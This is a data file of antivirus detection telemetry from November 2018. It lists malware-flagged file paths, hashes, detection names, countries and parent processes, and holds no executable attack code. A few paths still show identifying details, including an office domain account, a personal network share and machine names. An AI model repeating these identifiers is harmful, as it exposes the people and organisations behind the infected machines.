  Row(detection=Row(filename='mapdrive.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\MapDrive.exe", filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-224303-3813d996', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dbe9e11c\\AVSCAN-20181101-224249-354725F3\\AVSCAN-20181101-224303-3813D996', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:42:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='\\\\\\/Embedding', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T03:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184034-4ede26e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a343d1e\\AVSCAN-20181102-184015-3EBD2D4A\\AVSCAN-20181102-184034-4EDE26E6', filesize=192000, name='TR/Confuser.766eaa.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203740-3a220c5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-203740-3A220C5A', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T14:31:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133014-78f2eded', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c26308\\AVSCAN-20181102-132144-35D13AB6\\AVSCAN-20181102-133014-78F2EDED', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='dba52e518a7777fc71fa48ab8c290083170b0e11c3683e84a7962f24fbdfea3c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:30:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221438-5778d04c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221438-5778D04C', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pconverter.4d8794b310fe4ba59fbfea6f2d80fabe.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.4d8794b310fe4ba59fbfea6f2d80fabe.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:58:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175624-e99f3ea5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175624-E99F3EA5', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:53:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144219-21e35fa9', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-144155-B9D40809\\AVSCAN-20181102-144219-21E35FA9', filesize=192000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='malwarebytes anti-malware 3612711 premium crack keygen.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.647\\malwarebytes anti-malware 3612711 premium crack keygen.exe', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='cb0662850abb074dbdf2c7eb89152a9256149dff075aeffa274a6b99a9cded1e', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$DIa0.487\\\\\\\\malwarebytes anti-malware 3612711 premium crack keygen.iso\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1500048, timestamp='2018-11-02T08:15:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000718b3', filepath='C:\\Windows\\Temp\\53f972a6-1cff-41af-bddc-52c0d729daa2\\tmp000007c3\\tmp000718b3', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='e72149f1873e921830da702316382cd9f90a4dab7c78c5fed637ac8d46b2a1e6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.5.202.7299\\AdAwareService.exe', parentsize=713568, timestamp='2018-11-02T16:13:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dcae30c8c3eba52071f63a022d70808bbd48d73dd5f12cfde5d8b0b4f90bebbd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\DCAE30C8C3EBA52071F63A022D70808BBD48D73DD5F12CFDE5D8B0B4F90BEBBD', filesize=512000, name='ADWARE/Taranis.3958.#M1.#R1'), hash='dcae30c8c3eba52071f63a022d70808bbd48d73dd5f12cfde5d8b0b4f90bebbd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:07:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211512-78487b4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30a90ba6\\AVSCAN-20181102-211453-74D38F4E\\AVSCAN-20181102-211512-78487B4D', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mstrxu.exe', filepath='C:\\ProgramData\\mstrxu.exe', filesize=81104000, name='TR/Dropper.Gen.#M300.#R3204'), hash='b10b118a4fd177f890edd54813d70c547e0b9ddcca445f3747a571881b16cd8f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\33.171.200\\software_reporter_tool.exe', parentsize=13832312, timestamp='2018-11-02T09:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T12:31:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0006550e', filepath='C:\\Windows\\Temp\\53f972a6-1cff-41af-bddc-52c0d729daa2\\tmp000007c3\\tmp0006550e', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='e030e0756d952da12d36f735444150ea6af2a10eb740e557186a3ddbdeb33399', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.5.202.7299\\AdAwareService.exe', parentsize=713568, timestamp='2018-11-02T01:25:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230122-2f085ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73dd45ba\\AVSCAN-20181102-225936-1C8656E0\\AVSCAN-20181102-230122-2F085FF1', filesize=1024000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='ea84e431e8bae52113bd4e10307b7ecb9001482c800d43d1695cbf4671fc5420', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:01:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='954db86890acf9e4f5b73ab6da7608f22fc0a05902e5cdd3283469f4959f6a04', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\954DB86890ACF9E4F5B73AB6DA7608F22FC0A05902E5CDD3283469F4959F6A04', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='954db86890acf9e4f5b73ab6da7608f22fc0a05902e5cdd3283469f4959f6a04', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsj9C92.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T15:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.vir', filepath='C:\\ProgramData\\vshub.VIR', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Reason\\Security\\rsEngineSvc.exe', parentsize=145176, timestamp='2018-11-02T02:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274010.scr', filepath='F:\\scan-peta-wb-sp2010\\3274010\\3274010.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:03:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0m2ks1n4ahy\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:24:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='a84a0e6d51867fa56b249951fc7d2dab6fe7556bb756252da77db44d73f5b45b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='verif3d.exe', filepath='\\\\ts-xelcea\\share\\francesca_computer_2012\\francesca\\LAVORO\\sts2011\\cdswin\\verif3d.exe', filesize=1984000, name='W32/Stanit.#M1.#R1'), hash='e7c4d9aee6f94fc3342107b58709f0026f8a6852d63ce62c9f0d19d81a76ba8f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:43:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\4h30vgnjumr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541098846.5bdb4d5e52ec7', country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Free\\264368294.exe', parentsize=671232, timestamp='2018-11-02T00:07:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131749-3154df0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131749-3154DF0B', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nskC6E5.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T09:31:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023d21e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d21e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237c57', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237c57', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:12:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cd16', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cd16', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:40:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='99166412ebc575f15fb0ada3d735f14287eea8e9', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\99166412ebc575f15fb0ada3d735f14287eea8e9', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:03:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111052-a6c7e583', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-111044-A61821D0\\AVSCAN-20181104-111052-A6C7E583', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cf3e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cf3e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:43:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='llm2.exe', filepath='\\\\?\\D:\\programme\\LM\\Win32\\lLM2.exe', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='c113eda2d6e9ab79b40ef15ec2ccda2ffe3cb82ae63a18d5ccf7e477832d9170', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 utc).exe', filepath='\\\\?\\D:\\ServerFolders\\File History Backups\\Admin03\\Admin03@MCCOYOFFICE.local\\DESKTOP-GQ6NIDG\\Data\\C\\Users\\admin03.MCCOYOFFICE\\Downloads\\FileZilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 UTC).exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T06:49:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291193', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291193', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:46:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023eb83', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023eb83', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:06:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='-__---___---___---__-_-_--___--_-_----_.{288ec649-af78-4771-975c-a33ded88889f}', filepath='\\?\\E:\\\xa0\\-__---___---___---__-_-_--___--_-_----_.{288EC649-AF78-4771-975C-A33DED88889F}', filesize=5532000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='b915a75a26414844da5b060ed4491e735c658e564a53a1562cf31b40ee9d5563', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:59:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsi133D.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T17:08:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='email sender.exe', filepath='F:\\هام\\Email Sender Pro V0.2\\Email Sender.exe', filesize=576000, name='W32/Neshta.A.#M1.#R1'), hash='eac8f7a07044454e7584d70d5c09e77a41afe39a659eed19311fa88b273d4061', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:12:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090907-21615f99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db8dd2eb\\AVSCAN-20181104-090024-C0286FC2\\AVSCAN-20181104-090907-21615F99', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:09:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='689342.exe', filepath='E:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T13:05:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T08:07:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~sea1bf.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seA1BF.tmp', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:15:38Z'), dt=datetime.date(2018, 11, 1))],
